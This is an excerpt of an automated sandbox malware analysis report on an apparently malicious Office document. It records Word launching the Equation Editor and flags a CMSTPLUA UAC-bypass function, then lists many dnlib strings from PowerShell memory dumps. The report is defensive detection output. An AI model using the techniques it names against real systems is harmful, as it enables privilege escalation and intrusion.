            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.drStream path '_1783482884/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.drStream path '_1783482888/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.drStream path '_1783482909/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.drStream path '_1783482910/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.drStream path '_1783482912/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

            Privilege Escalation

            barindex
            Contains functionality to bypass UAC (CMSTPLUA)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004074FD _wcslen,CoGetObject,12_2_004074FD
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
